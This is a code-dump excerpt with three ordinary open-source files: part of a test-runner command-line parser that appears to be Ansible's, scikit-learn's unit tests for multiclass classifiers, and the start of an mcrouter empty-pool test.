units.add_argument('--collect-only',
action='store_true',
help='collect tests but do not execute them')
add_extra_docker_options(units, integration=False)
compiler = subparsers.add_parser('compile',
parents=[test],
help='compile tests')
compiler.set_defaults(func=command_compile,
targets=walk_compile_targets,
config=CompileConfig)
compiler.add_argument('--python',
metavar='VERSION',
choices=COMPILE_PYTHON_VERSIONS + ('default',),
help='python version: %s' % ', '.join(COMPILE_PYTHON_VERSIONS))
add_lint(compiler)
add_extra_docker_options(compiler, integration=False)
sanity = subparsers.add_parser('sanity',
parents=[test],
help='sanity tests')
sanity.set_defaults(func=command_sanity,
targets=walk_sanity_targets,
config=SanityConfig)
sanity.add_argument('--test',
metavar='TEST',
action='append',
choices=[test.name for test in sanity_get_tests()],
help='tests to run').completer = complete_sanity_test
sanity.add_argument('--skip-test',
metavar='TEST',
action='append',
choices=[test.name for test in sanity_get_tests()],
help='tests to skip').completer = complete_sanity_test
sanity.add_argument('--list-tests',
action='store_true',
help='list available tests')
sanity.add_argument('--python',
metavar='VERSION',
choices=SUPPORTED_PYTHON_VERSIONS + ('default',),
help='python version: %s' % ', '.join(SUPPORTED_PYTHON_VERSIONS))
sanity.add_argument('--base-branch',
help=argparse.SUPPRESS)
add_lint(sanity)
add_extra_docker_options(sanity, integration=False)
shell = subparsers.add_parser('shell',
parents=[common],
help='open an interactive shell')
shell.set_defaults(func=command_shell,
config=ShellConfig)
add_environments(shell, tox_version=True)
add_extra_docker_options(shell)
coverage_common = argparse.ArgumentParser(add_help=False, parents=[common])
add_environments(coverage_common, tox_version=True, tox_only=True)
coverage = subparsers.add_parser('coverage',
help='code coverage management and reporting')
coverage_subparsers = coverage.add_subparsers(metavar='COMMAND')
coverage_subparsers.required = True # work-around for python 3 bug which makes subparsers optional
coverage_combine = coverage_subparsers.add_parser('combine',
parents=[coverage_common],
help='combine coverage data and rewrite remote paths')
coverage_combine.set_defaults(func=lib.cover.command_coverage_combine,
config=lib.cover.CoverageConfig)
add_extra_coverage_options(coverage_combine)
coverage_erase = coverage_subparsers.add_parser('erase',
parents=[coverage_common],
help='erase coverage data files')
coverage_erase.set_defaults(func=lib.cover.command_coverage_erase,
config=lib.cover.CoverageConfig)
coverage_report = coverage_subparsers.add_parser('report',
parents=[coverage_common],
help='generate console coverage report')
coverage_report.set_defaults(func=lib.cover.command_coverage_report,
config=lib.cover.CoverageReportConfig)
coverage_report.add_argument('--show-missing',
action='store_true',
help='show line numbers of statements not executed')
add_extra_coverage_options(coverage_report)
coverage_html = coverage_subparsers.add_parser('html',
parents=[coverage_common],
help='generate html coverage report')
coverage_html.set_defaults(func=lib.cover.command_coverage_html,
config=lib.cover.CoverageConfig)
add_extra_coverage_options(coverage_html)
coverage_xml = coverage_subparsers.add_parser('xml',
parents=[coverage_common],
help='generate xml coverage report')
coverage_xml.set_defaults(func=lib.cover.command_coverage_xml,
config=lib.cover.CoverageConfig)
add_extra_coverage_options(coverage_xml)
if argcomplete:
argcomplete.autocomplete(parser, always_complete_options=False, validator=lambda i, k: True)
args = parser.parse_args()
if args.explain and not args.verbosity:
args.verbosity = 1
if args.color == 'yes':
args.color = True
elif args.color == 'no':
args.color = False
else:
args.color = sys.stdout.isatty()
return args
def add_lint(parser):
"""
:type parser: argparse.ArgumentParser
"""
parser.add_argument('--lint',
action='store_true',
help='write lint output to stdout, everything else stderr')
parser.add_argument('--junit',
action='store_true',
help='write test failures to junit xml files')
parser.add_argument('--failure-ok',
action='store_true',
help='exit successfully on failed tests after saving results')
def add_changes(parser, argparse):
"""
:type parser: argparse.ArgumentParser
:type argparse: argparse
"""
parser.add_argument('--changed', action='store_true', help='limit targets based on changes')
changes = parser.add_argument_group(title='change detection arguments')
changes.add_argument('--tracked', action='store_true', help=argparse.SUPPRESS)
changes.add_argument('--untracked', action='store_true', help='include untracked files')
changes.add_argument('--ignore-committed', dest='committed', action='store_false', help='exclude committed files')
changes.add_argument('--ignore-staged', dest='staged', action='store_false', help='exclude staged files')
changes.add_argument('--ignore-unstaged', dest='unstaged', action='store_false', help='exclude unstaged files')
changes.add_argument('--changed-from', metavar='PATH', help=argparse.SUPPRESS)
changes.add_argument('--changed-path', metavar='PATH', action='append', help=argparse.SUPPRESS)
def add_environments(parser, tox_version=False, tox_only=False):
"""
:type parser: argparse.ArgumentParser
:type tox_version: bool
:type tox_only: bool
"""
parser.add_argument('--requirements',
action='store_true',
help='install command requirements')
environments = parser.add_mutually_exclusive_group()
environments.add_argument('--local',
action='store_true',
help='run from the local environment')
if tox_version:
environments.add_argument('--tox',
metavar='VERSION',
nargs='?',
default=None,
const='.'.join(str(i) for i in sys.version_info[:2]),
choices=SUPPORTED_PYTHON_VERSIONS,
help='run from a tox virtualenv: %s' % ', '.join(SUPPORTED_PYTHON_VERSIONS))
else:
environments.add_argument('--tox',
action='store_true',
help='run from a tox virtualenv')
tox = parser.add_argument_group(title='tox arguments')
tox.add_argument('--tox-sitepackages',
action='store_true',
help='allow access to globally installed packages')
if tox_only:
environments.set_defaults(
docker=None,
remote=None,
remote_stage=None,
remote_aws_region=None,
remote_terminate=None,
)
return
environments.add_argument('--docker',
metavar='IMAGE',
nargs='?',
default=None,
const='default',
help='run from a docker container').completer = complete_docker
environments.add_argument('--remote',
metavar='PLATFORM',
default=None,
help='run from a remote instance').completer = complete_remote
remote = parser.add_argument_group(title='remote arguments')
remote.add_argument('--remote-stage',
metavar='STAGE',
help='remote stage to use: %(choices)s',
choices=['prod', 'dev'],
default='prod')
remote.add_argument('--remote-aws-region',
metavar='REGION',
help='remote aws region to use: %(choices)s (default: auto)',
choices=sorted(AWS_ENDPOINTS),
default=None)
remote.add_argument('--remote-terminate',
metavar='WHEN',
help='terminate remote instance: %(choices)s (default: %(default)s)',
choices=['never', 'always', 'success'],
default='never')
def add_extra_coverage_options(parser):
"""
:type parser: argparse.ArgumentParser
"""
parser.add_argument('--group-by',
metavar='GROUP',
action='append',
choices=lib.cover.COVERAGE_GROUPS,
help='group output by: %s' % ', '.join(lib.cover.COVERAGE_GROUPS))
parser.add_argument('--all',
action='store_true',
help='include all python source files')
parser.add_argument('--stub',
action='store_true',
help='generate empty report of all python source files')
def add_extra_docker_options(parser, integration=True):
"""
:type parser: argparse.ArgumentParser
:type integration: bool
"""
docker = parser.add_argument_group(title='docker arguments')
docker.add_argument('--docker-no-pull',
action='store_false',
dest='docker_pull',
help='do not explicitly pull the latest docker images')
docker.add_argument('--docker-keep-git',
action='store_true',
help='transfer git related files into the docker container')
if not integration:
return
docker.add_argument('--docker-util',
metavar='IMAGE',
default='httptester',
help='docker utility image to provide test services')
docker.add_argument('--docker-privileged',
action='store_true',
help='run docker container in privileged mode')
def complete_target(prefix, parsed_args, **_):
"""
:type prefix: unicode
:type parsed_args: any
:rtype: list[str]
"""
return find_target_completion(parsed_args.targets, prefix)
def complete_remote(prefix, parsed_args, **_):
"""
:type prefix: unicode
:type parsed_args: any
:rtype: list[str]
"""
del parsed_args
with open('test/runner/completion/remote.txt', 'r') as completion_fd:
images = completion_fd.read().splitlines()
return [i for i in images if i.startswith(prefix)]
def complete_docker(prefix, parsed_args, **_):
"""
:type prefix: unicode
:type parsed_args: any
:rtype: list[str]
"""
del parsed_args
images = sorted(get_docker_completion().keys())
return [i for i in images if i.startswith(prefix)]
def complete_windows(prefix, parsed_args, **_):
"""
:type prefix: unicode
:type parsed_args: any
:rtype: list[str]
"""
with open('test/runner/completion/windows.txt', 'r') as completion_fd:
images = completion_fd.read().splitlines()
return [i for i in images if i.startswith(prefix) and (not parsed_args.windows or i not in parsed_args.windows)]
def complete_network_platform(prefix, parsed_args, **_):
"""
:type prefix: unicode
:type parsed_args: any
:rtype: list[str]
"""
with open('test/runner/completion/network.txt', 'r') as completion_fd:
images = completion_fd.read().splitlines()
return [i for i in images if i.startswith(prefix) and (not parsed_args.platform or i not in parsed_args.platform)]
def complete_sanity_test(prefix, parsed_args, **_):
"""
:type prefix: unicode
:type parsed_args: any
:rtype: list[str]
"""
del parsed_args
tests = sorted(t.name for t in sanity_get_tests())
return [i for i in tests if i.startswith(prefix)]
if __name__ == '__main__':
main()
|
JPFrancoia/scikit-learn
|
refs/heads/master
|
sklearn/tests/test_multiclass.py
|
8
|
import numpy as np
import scipy.sparse as sp
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_almost_equal
from sklearn.utils.testing import assert_true
from sklearn.utils.testing import assert_false
from sklearn.utils.testing import assert_raises
from sklearn.utils.testing import assert_warns
from sklearn.utils.testing import assert_greater
from sklearn.utils.testing import assert_raise_message
from sklearn.multiclass import OneVsRestClassifier
from sklearn.multiclass import OneVsOneClassifier
from sklearn.multiclass import OutputCodeClassifier
from sklearn.utils.multiclass import check_classification_targets, type_of_target
from sklearn.utils import shuffle
from sklearn.metrics import precision_score
from sklearn.metrics import recall_score
from sklearn.svm import LinearSVC, SVC
from sklearn.naive_bayes import MultinomialNB
from sklearn.linear_model import (LinearRegression, Lasso, ElasticNet, Ridge,
Perceptron, LogisticRegression)
from sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor
from sklearn.model_selection import GridSearchCV, cross_val_score
from sklearn.pipeline import Pipeline
from sklearn import svm
from sklearn import datasets
from sklearn.externals.six.moves import zip
iris = datasets.load_iris()
rng = np.random.RandomState(0)
perm = rng.permutation(iris.target.size)
iris.data = iris.data[perm]
iris.target = iris.target[perm]
n_classes = 3
def test_ovr_exceptions():
ovr = OneVsRestClassifier(LinearSVC(random_state=0))
assert_raises(ValueError, ovr.predict, [])
# Fail on multioutput data
assert_raises(ValueError, OneVsRestClassifier(MultinomialNB()).fit,
np.array([[1, 0], [0, 1]]),
np.array([[1, 2], [3, 1]]))
assert_raises(ValueError, OneVsRestClassifier(MultinomialNB()).fit,
np.array([[1, 0], [0, 1]]),
np.array([[1.5, 2.4], [3.1, 0.8]]))
def test_check_classification_targets():
    # Test that check_classification_targets raises a ValueError whose
    # message names the invalid (continuous) target type. #5782
y = np.array([0.0, 1.1, 2.0, 3.0])
msg = type_of_target(y)
assert_raise_message(ValueError, msg, check_classification_targets, y)
def test_ovr_fit_predict():
# A classifier which implements decision_function.
ovr = OneVsRestClassifier(LinearSVC(random_state=0))
pred = ovr.fit(iris.data, iris.target).predict(iris.data)
assert_equal(len(ovr.estimators_), n_classes)
clf = LinearSVC(random_state=0)
pred2 = clf.fit(iris.data, iris.target).predict(iris.data)
assert_equal(np.mean(iris.target == pred), np.mean(iris.target == pred2))
# A classifier which implements predict_proba.
ovr = OneVsRestClassifier(MultinomialNB())
pred = ovr.fit(iris.data, iris.target).predict(iris.data)
assert_greater(np.mean(iris.target == pred), 0.65)
def test_ovr_partial_fit():
    # Test if partial_fit is working as intended
X, y = shuffle(iris.data, iris.target, random_state=0)
ovr = OneVsRestClassifier(MultinomialNB())
ovr.partial_fit(X[:100], y[:100], np.unique(y))
ovr.partial_fit(X[100:], y[100:])
pred = ovr.predict(X)
ovr2 = OneVsRestClassifier(MultinomialNB())
pred2 = ovr2.fit(X, y).predict(X)
assert_almost_equal(pred, pred2)
assert_equal(len(ovr.estimators_), len(np.unique(y)))
assert_greater(np.mean(y == pred), 0.65)
    # Test when mini-batches don't have all classes
ovr = OneVsRestClassifier(MultinomialNB())
ovr.partial_fit(iris.data[:60], iris.target[:60], np.unique(iris.target))
ovr.partial_fit(iris.data[60:], iris.target[60:])
pred = ovr.predict(iris.data)
ovr2 = OneVsRestClassifier(MultinomialNB())
pred2 = ovr2.fit(iris.data, iris.target).predict(iris.data)
assert_almost_equal(pred, pred2)
assert_equal(len(ovr.estimators_), len(np.unique(iris.target)))
assert_greater(np.mean(iris.target == pred), 0.65)
def test_ovr_ovo_regressor():
# test that ovr and ovo work on regressors which don't have a decision_function
ovr = OneVsRestClassifier(DecisionTreeRegressor())
pred = ovr.fit(iris.data, iris.target).predict(iris.data)
assert_equal(len(ovr.estimators_), n_classes)
assert_array_equal(np.unique(pred), [0, 1, 2])
# we are doing something sensible
assert_greater(np.mean(pred == iris.target), .9)
ovr = OneVsOneClassifier(DecisionTreeRegressor())
pred = ovr.fit(iris.data, iris.target).predict(iris.data)
assert_equal(len(ovr.estimators_), n_classes * (n_classes - 1) / 2)
assert_array_equal(np.unique(pred), [0, 1, 2])
# we are doing something sensible
assert_greater(np.mean(pred == iris.target), .9)
def test_ovr_fit_predict_sparse():
for sparse in [sp.csr_matrix, sp.csc_matrix, sp.coo_matrix, sp.dok_matrix,
sp.lil_matrix]:
base_clf = MultinomialNB(alpha=1)
X, Y = datasets.make_multilabel_classification(n_samples=100,
n_features=20,
n_classes=5,
n_labels=3,
length=50,
allow_unlabeled=True,
random_state=0)
X_train, Y_train = X[:80], Y[:80]
X_test = X[80:]
clf = OneVsRestClassifier(base_clf).fit(X_train, Y_train)
Y_pred = clf.predict(X_test)
clf_sprs = OneVsRestClassifier(base_clf).fit(X_train, sparse(Y_train))
Y_pred_sprs = clf_sprs.predict(X_test)
assert_true(clf.multilabel_)
assert_true(sp.issparse(Y_pred_sprs))
assert_array_equal(Y_pred_sprs.toarray(), Y_pred)
# Test predict_proba
Y_proba = clf_sprs.predict_proba(X_test)
# predict assigns a label if the probability that the
# sample has the label is greater than 0.5.
pred = Y_proba > .5
assert_array_equal(pred, Y_pred_sprs.toarray())
# Test decision_function
clf_sprs = OneVsRestClassifier(svm.SVC()).fit(X_train, sparse(Y_train))
dec_pred = (clf_sprs.decision_function(X_test) > 0).astype(int)
assert_array_equal(dec_pred, clf_sprs.predict(X_test).toarray())
def test_ovr_always_present():
# Test that ovr works with classes that are always present or absent.
    # Note: this tests the case where _ConstantPredictor is utilised
X = np.ones((10, 2))
X[:5, :] = 0
# Build an indicator matrix where two features are always on.
# As list of lists, it would be: [[int(i >= 5), 2, 3] for i in range(10)]
y = np.zeros((10, 3))
y[5:, 0] = 1
y[:, 1] = 1
y[:, 2] = 1
ovr = OneVsRestClassifier(LogisticRegression())
assert_warns(UserWarning, ovr.fit, X, y)
y_pred = ovr.predict(X)
assert_array_equal(np.array(y_pred), np.array(y))
y_pred = ovr.decision_function(X)
assert_equal(np.unique(y_pred[:, -2:]), 1)
y_pred = ovr.predict_proba(X)
assert_array_equal(y_pred[:, -1], np.ones(X.shape[0]))
# y has a constantly absent label
y = np.zeros((10, 2))
y[5:, 0] = 1 # variable label
ovr = OneVsRestClassifier(LogisticRegression())
assert_warns(UserWarning, ovr.fit, X, y)
y_pred = ovr.predict_proba(X)
assert_array_equal(y_pred[:, -1], np.zeros(X.shape[0]))
def test_ovr_multiclass():
# Toy dataset where features correspond directly to labels.
X = np.array([[0, 0, 5], [0, 5, 0], [3, 0, 0], [0, 0, 6], [6, 0, 0]])
y = ["eggs", "spam", "ham", "eggs", "ham"]
Y = np.array([[0, 0, 1],
[0, 1, 0],
[1, 0, 0],
[0, 0, 1],
[1, 0, 0]])
classes = set("ham eggs spam".split())
for base_clf in (MultinomialNB(), LinearSVC(random_state=0),
LinearRegression(), Ridge(),
ElasticNet()):
clf = OneVsRestClassifier(base_clf).fit(X, y)
assert_equal(set(clf.classes_), classes)
y_pred = clf.predict(np.array([[0, 0, 4]]))[0]
assert_equal(set(y_pred), set("eggs"))
# test input as label indicator matrix
clf = OneVsRestClassifier(base_clf).fit(X, Y)
y_pred = clf.predict([[0, 0, 4]])[0]
assert_array_equal(y_pred, [0, 0, 1])
def test_ovr_binary():
# Toy dataset where features correspond directly to labels.
X = np.array([[0, 0, 5], [0, 5, 0], [3, 0, 0], [0, 0, 6], [6, 0, 0]])
y = ["eggs", "spam", "spam", "eggs", "spam"]
Y = np.array([[0, 1, 1, 0, 1]]).T
classes = set("eggs spam".split())
def conduct_test(base_clf, test_predict_proba=False):
clf = OneVsRestClassifier(base_clf).fit(X, y)
assert_equal(set(clf.classes_), classes)
y_pred = clf.predict(np.array([[0, 0, 4]]))[0]
assert_equal(set(y_pred), set("eggs"))
if test_predict_proba:
X_test = np.array([[0, 0, 4]])
probabilities = clf.predict_proba(X_test)
assert_equal(2, len(probabilities[0]))
assert_equal(clf.classes_[np.argmax(probabilities, axis=1)],
clf.predict(X_test))
# test input as label indicator matrix
clf = OneVsRestClassifier(base_clf).fit(X, Y)
y_pred = clf.predict([[3, 0, 0]])[0]
assert_equal(y_pred, 1)
for base_clf in (LinearSVC(random_state=0), LinearRegression(),
Ridge(), ElasticNet()):
conduct_test(base_clf)
for base_clf in (MultinomialNB(), SVC(probability=True),
LogisticRegression()):
conduct_test(base_clf, test_predict_proba=True)
def test_ovr_multilabel():
# Toy dataset where features correspond directly to labels.
X = np.array([[0, 4, 5], [0, 5, 0], [3, 3, 3], [4, 0, 6], [6, 0, 0]])
y = np.array([[0, 1, 1],
[0, 1, 0],
[1, 1, 1],
[1, 0, 1],
[1, 0, 0]])
for base_clf in (MultinomialNB(), LinearSVC(random_state=0),
LinearRegression(), Ridge(),
ElasticNet(), Lasso(alpha=0.5)):
clf = OneVsRestClassifier(base_clf).fit(X, y)
y_pred = clf.predict([[0, 4, 4]])[0]
assert_array_equal(y_pred, [0, 1, 1])
assert_true(clf.multilabel_)
def test_ovr_fit_predict_svc():
ovr = OneVsRestClassifier(svm.SVC())
ovr.fit(iris.data, iris.target)
assert_equal(len(ovr.estimators_), 3)
assert_greater(ovr.score(iris.data, iris.target), .9)
def test_ovr_multilabel_dataset():
base_clf = MultinomialNB(alpha=1)
for au, prec, recall in zip((True, False), (0.51, 0.66), (0.51, 0.80)):
X, Y = datasets.make_multilabel_classification(n_samples=100,
n_features=20,
n_classes=5,
n_labels=2,
length=50,
allow_unlabeled=au,
random_state=0)
X_train, Y_train = X[:80], Y[:80]
X_test, Y_test = X[80:], Y[80:]
clf = OneVsRestClassifier(base_clf).fit(X_train, Y_train)
Y_pred = clf.predict(X_test)
assert_true(clf.multilabel_)
assert_almost_equal(precision_score(Y_test, Y_pred, average="micro"),
prec,
decimal=2)
assert_almost_equal(recall_score(Y_test, Y_pred, average="micro"),
recall,
decimal=2)
def test_ovr_multilabel_predict_proba():
base_clf = MultinomialNB(alpha=1)
for au in (False, True):
X, Y = datasets.make_multilabel_classification(n_samples=100,
n_features=20,
n_classes=5,
n_labels=3,
length=50,
allow_unlabeled=au,
random_state=0)
X_train, Y_train = X[:80], Y[:80]
X_test = X[80:]
clf = OneVsRestClassifier(base_clf).fit(X_train, Y_train)
# decision function only estimator. Fails in current implementation.
decision_only = OneVsRestClassifier(svm.SVR()).fit(X_train, Y_train)
assert_raises(AttributeError, decision_only.predict_proba, X_test)
# Estimator with predict_proba disabled, depending on parameters.
decision_only = OneVsRestClassifier(svm.SVC(probability=False))
decision_only.fit(X_train, Y_train)
assert_raises(AttributeError, decision_only.predict_proba, X_test)
Y_pred = clf.predict(X_test)
Y_proba = clf.predict_proba(X_test)
# predict assigns a label if the probability that the
# sample has the label is greater than 0.5.
pred = Y_proba > .5
assert_array_equal(pred, Y_pred)
def test_ovr_single_label_predict_proba():
base_clf = MultinomialNB(alpha=1)
X, Y = iris.data, iris.target
X_train, Y_train = X[:80], Y[:80]
X_test = X[80:]
clf = OneVsRestClassifier(base_clf).fit(X_train, Y_train)
# decision function only estimator. Fails in current implementation.
decision_only = OneVsRestClassifier(svm.SVR()).fit(X_train, Y_train)
assert_raises(AttributeError, decision_only.predict_proba, X_test)
Y_pred = clf.predict(X_test)
Y_proba = clf.predict_proba(X_test)
assert_almost_equal(Y_proba.sum(axis=1), 1.0)
# predict assigns a label if the probability that the
# sample has the label is greater than 0.5.
pred = np.array([l.argmax() for l in Y_proba])
assert_false((pred - Y_pred).any())
def test_ovr_multilabel_decision_function():
X, Y = datasets.make_multilabel_classification(n_samples=100,
n_features=20,
n_classes=5,
n_labels=3,
length=50,
allow_unlabeled=True,
random_state=0)
X_train, Y_train = X[:80], Y[:80]
X_test = X[80:]
clf = OneVsRestClassifier(svm.SVC()).fit(X_train, Y_train)
assert_array_equal((clf.decision_function(X_test) > 0).astype(int),
clf.predict(X_test))
def test_ovr_single_label_decision_function():
X, Y = datasets.make_classification(n_samples=100,
n_features=20,
random_state=0)
X_train, Y_train = X[:80], Y[:80]
X_test = X[80:]
clf = OneVsRestClassifier(svm.SVC()).fit(X_train, Y_train)
assert_array_equal(clf.decision_function(X_test).ravel() > 0,
clf.predict(X_test))
def test_ovr_gridsearch():
ovr = OneVsRestClassifier(LinearSVC(random_state=0))
Cs = [0.1, 0.5, 0.8]
cv = GridSearchCV(ovr, {'estimator__C': Cs})
cv.fit(iris.data, iris.target)
best_C = cv.best_estimator_.estimators_[0].C
assert_true(best_C in Cs)
def test_ovr_pipeline():
# Test with pipeline of length one
# This test is needed because the multiclass estimators may fail to detect
# the presence of predict_proba or decision_function.
clf = Pipeline([("tree", DecisionTreeClassifier())])
ovr_pipe = OneVsRestClassifier(clf)
ovr_pipe.fit(iris.data, iris.target)
ovr = OneVsRestClassifier(DecisionTreeClassifier())
ovr.fit(iris.data, iris.target)
assert_array_equal(ovr.predict(iris.data), ovr_pipe.predict(iris.data))
def test_ovr_coef_():
for base_classifier in [SVC(kernel='linear', random_state=0), LinearSVC(random_state=0)]:
# SVC has sparse coef with sparse input data
ovr = OneVsRestClassifier(base_classifier)
for X in [iris.data, sp.csr_matrix(iris.data)]:
# test with dense and sparse coef
ovr.fit(X, iris.target)
shape = ovr.coef_.shape
assert_equal(shape[0], n_classes)
assert_equal(shape[1], iris.data.shape[1])
# don't densify sparse coefficients
assert_equal(sp.issparse(ovr.estimators_[0].coef_), sp.issparse(ovr.coef_))
def test_ovr_coef_exceptions():
# Not fitted exception!
ovr = OneVsRestClassifier(LinearSVC(random_state=0))
# lambda is needed because we don't want coef_ to be evaluated right away
assert_raises(ValueError, lambda x: ovr.coef_, None)
# Doesn't have coef_ exception!
ovr = OneVsRestClassifier(DecisionTreeClassifier())
ovr.fit(iris.data, iris.target)
assert_raises(AttributeError, lambda x: ovr.coef_, None)
def test_ovo_exceptions():
ovo = OneVsOneClassifier(LinearSVC(random_state=0))
assert_raises(ValueError, ovo.predict, [])
def test_ovo_fit_on_list():
# Test that OneVsOne fitting works with a list of targets and yields the
# same output as predict from an array
ovo = OneVsOneClassifier(LinearSVC(random_state=0))
prediction_from_array = ovo.fit(iris.data, iris.target).predict(iris.data)
iris_data_list = [list(a) for a in iris.data]
prediction_from_list = ovo.fit(iris_data_list,
list(iris.target)).predict(iris_data_list)
assert_array_equal(prediction_from_array, prediction_from_list)
def test_ovo_fit_predict():
# A classifier which implements decision_function.
ovo = OneVsOneClassifier(LinearSVC(random_state=0))
ovo.fit(iris.data, iris.target).predict(iris.data)
assert_equal(len(ovo.estimators_), n_classes * (n_classes - 1) / 2)
# A classifier which implements predict_proba.
ovo = OneVsOneClassifier(MultinomialNB())
ovo.fit(iris.data, iris.target).predict(iris.data)
assert_equal(len(ovo.estimators_), n_classes * (n_classes - 1) / 2)
def test_ovo_partial_fit_predict():
X, y = shuffle(iris.data, iris.target)
ovo1 = OneVsOneClassifier(MultinomialNB())
ovo1.partial_fit(X[:100], y[:100], np.unique(y))
ovo1.partial_fit(X[100:], y[100:])
pred1 = ovo1.predict(X)
ovo2 = OneVsOneClassifier(MultinomialNB())
ovo2.fit(X, y)
pred2 = ovo2.predict(X)
assert_equal(len(ovo1.estimators_), n_classes * (n_classes - 1) / 2)
assert_greater(np.mean(y == pred1), 0.65)
assert_almost_equal(pred1, pred2)
# Test when mini-batches don't have all target classes
ovo1 = OneVsOneClassifier(MultinomialNB())
ovo1.partial_fit(iris.data[:60], iris.target[:60], np.unique(iris.target))
ovo1.partial_fit(iris.data[60:], iris.target[60:])
pred1 = ovo1.predict(iris.data)
ovo2 = OneVsOneClassifier(MultinomialNB())
pred2 = ovo2.fit(iris.data, iris.target).predict(iris.data)
assert_almost_equal(pred1, pred2)
assert_equal(len(ovo1.estimators_), len(np.unique(iris.target)))
assert_greater(np.mean(iris.target == pred1), 0.65)
def test_ovo_decision_function():
n_samples = iris.data.shape[0]
ovo_clf = OneVsOneClassifier(LinearSVC(random_state=0))
ovo_clf.fit(iris.data, iris.target)
decisions = ovo_clf.decision_function(iris.data)
assert_equal(decisions.shape, (n_samples, n_classes))
assert_array_equal(decisions.argmax(axis=1), ovo_clf.predict(iris.data))
# Compute the votes
votes = np.zeros((n_samples, n_classes))
k = 0
for i in range(n_classes):
for j in range(i + 1, n_classes):
pred = ovo_clf.estimators_[k].predict(iris.data)
votes[pred == 0, i] += 1
votes[pred == 1, j] += 1
k += 1
# Extract votes and verify
assert_array_equal(votes, np.round(decisions))
for class_idx in range(n_classes):
        # For each sample and each class, there are only 3 possible vote
        # levels because there are only 3 distinct class pairs and thus
        # 3 distinct binary classifiers.
# Therefore, sorting predictions based on votes would yield
# mostly tied predictions:
assert_true(set(votes[:, class_idx]).issubset(set([0., 1., 2.])))
# The OVO decision function on the other hand is able to resolve
# most of the ties on this data as it combines both the vote counts
# and the aggregated confidence levels of the binary classifiers
# to compute the aggregate decision function. The iris dataset
# has 150 samples with a couple of duplicates. The OvO decisions
# can resolve most of the ties:
assert_greater(len(np.unique(decisions[:, class_idx])), 146)
def test_ovo_gridsearch():
ovo = OneVsOneClassifier(LinearSVC(random_state=0))
Cs = [0.1, 0.5, 0.8]
cv = GridSearchCV(ovo, {'estimator__C': Cs})
cv.fit(iris.data, iris.target)
best_C = cv.best_estimator_.estimators_[0].C
assert_true(best_C in Cs)
def test_ovo_ties():
# Test that ties are broken using the decision function,
# not defaulting to the smallest label
X = np.array([[1, 2], [2, 1], [-2, 1], [-2, -1]])
y = np.array([2, 0, 1, 2])
multi_clf = OneVsOneClassifier(Perceptron(shuffle=False))
ovo_prediction = multi_clf.fit(X, y).predict(X)
ovo_decision = multi_clf.decision_function(X)
# Classifiers are in order 0-1, 0-2, 1-2
# Use decision_function to compute the votes and the normalized
# sum_of_confidences, which is used to disambiguate when there is a tie in
# votes.
votes = np.round(ovo_decision)
normalized_confidences = ovo_decision - votes
# For the first point, there is one vote per class
assert_array_equal(votes[0, :], 1)
# For the rest, there is no tie and the prediction is the argmax
assert_array_equal(np.argmax(votes[1:], axis=1), ovo_prediction[1:])
# For the tie, the prediction is the class with the highest score
assert_equal(ovo_prediction[0], normalized_confidences[0].argmax())
def test_ovo_ties2():
# test that ties can not only be won by the first two labels
X = np.array([[1, 2], [2, 1], [-2, 1], [-2, -1]])
y_ref = np.array([2, 0, 1, 2])
# cycle through labels so that each label wins once
for i in range(3):
y = (y_ref + i) % 3
multi_clf = OneVsOneClassifier(Perceptron(shuffle=False))
ovo_prediction = multi_clf.fit(X, y).predict(X)
assert_equal(ovo_prediction[0], i % 3)
def test_ovo_string_y():
# Test that the OvO doesn't mess up the encoding of string labels
X = np.eye(4)
y = np.array(['a', 'b', 'c', 'd'])
ovo = OneVsOneClassifier(LinearSVC())
ovo.fit(X, y)
assert_array_equal(y, ovo.predict(X))
def test_ecoc_exceptions():
ecoc = OutputCodeClassifier(LinearSVC(random_state=0))
assert_raises(ValueError, ecoc.predict, [])
def test_ecoc_fit_predict():
# A classifier which implements decision_function.
ecoc = OutputCodeClassifier(LinearSVC(random_state=0),
code_size=2, random_state=0)
ecoc.fit(iris.data, iris.target).predict(iris.data)
assert_equal(len(ecoc.estimators_), n_classes * 2)
# A classifier which implements predict_proba.
ecoc = OutputCodeClassifier(MultinomialNB(), code_size=2, random_state=0)
ecoc.fit(iris.data, iris.target).predict(iris.data)
assert_equal(len(ecoc.estimators_), n_classes * 2)
def test_ecoc_gridsearch():
ecoc = OutputCodeClassifier(LinearSVC(random_state=0),
random_state=0)
Cs = [0.1, 0.5, 0.8]
cv = GridSearchCV(ecoc, {'estimator__C': Cs})
cv.fit(iris.data, iris.target)
best_C = cv.best_estimator_.estimators_[0].C
assert_true(best_C in Cs)
def test_pairwise_indices():
clf_precomputed = svm.SVC(kernel='precomputed')
X, y = iris.data, iris.target
ovr_false = OneVsOneClassifier(clf_precomputed)
linear_kernel = np.dot(X, X.T)
ovr_false.fit(linear_kernel, y)
n_estimators = len(ovr_false.estimators_)
precomputed_indices = ovr_false.pairwise_indices_
for idx in precomputed_indices:
assert_equal(idx.shape[0] * n_estimators / (n_estimators - 1),
linear_kernel.shape[0])
def test_pairwise_attribute():
clf_precomputed = svm.SVC(kernel='precomputed')
clf_notprecomputed = svm.SVC()
for MultiClassClassifier in [OneVsRestClassifier, OneVsOneClassifier]:
ovr_false = MultiClassClassifier(clf_notprecomputed)
assert_false(ovr_false._pairwise)
ovr_true = MultiClassClassifier(clf_precomputed)
assert_true(ovr_true._pairwise)
def test_pairwise_cross_val_score():
clf_precomputed = svm.SVC(kernel='precomputed')
clf_notprecomputed = svm.SVC(kernel='linear')
X, y = iris.data, iris.target
for MultiClassClassifier in [OneVsRestClassifier, OneVsOneClassifier]:
ovr_false = MultiClassClassifier(clf_notprecomputed)
ovr_true = MultiClassClassifier(clf_precomputed)
linear_kernel = np.dot(X, X.T)
score_precomputed = cross_val_score(ovr_true, linear_kernel, y)
score_linear = cross_val_score(ovr_false, X, y)
assert_array_equal(score_precomputed, score_linear)
|
tempbottle/mcrouter
|
refs/heads/master
|
mcrouter/test/test_empty_pool.py
|
13
|
# Copyright (c) 2015, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from mcrouter.test.McrouterTestCase import McrouterTestCase
class TestEmptyPool(McrouterTestCase):
config = './mcrouter/test/test_empty_pool.json'
extra_args = []
    def get_mcrouter(self, extra_args=None):
        return self.add_mcrouter(
            self.config,
            extra_args=extra_args if extra_args is not None else self.extra_args)
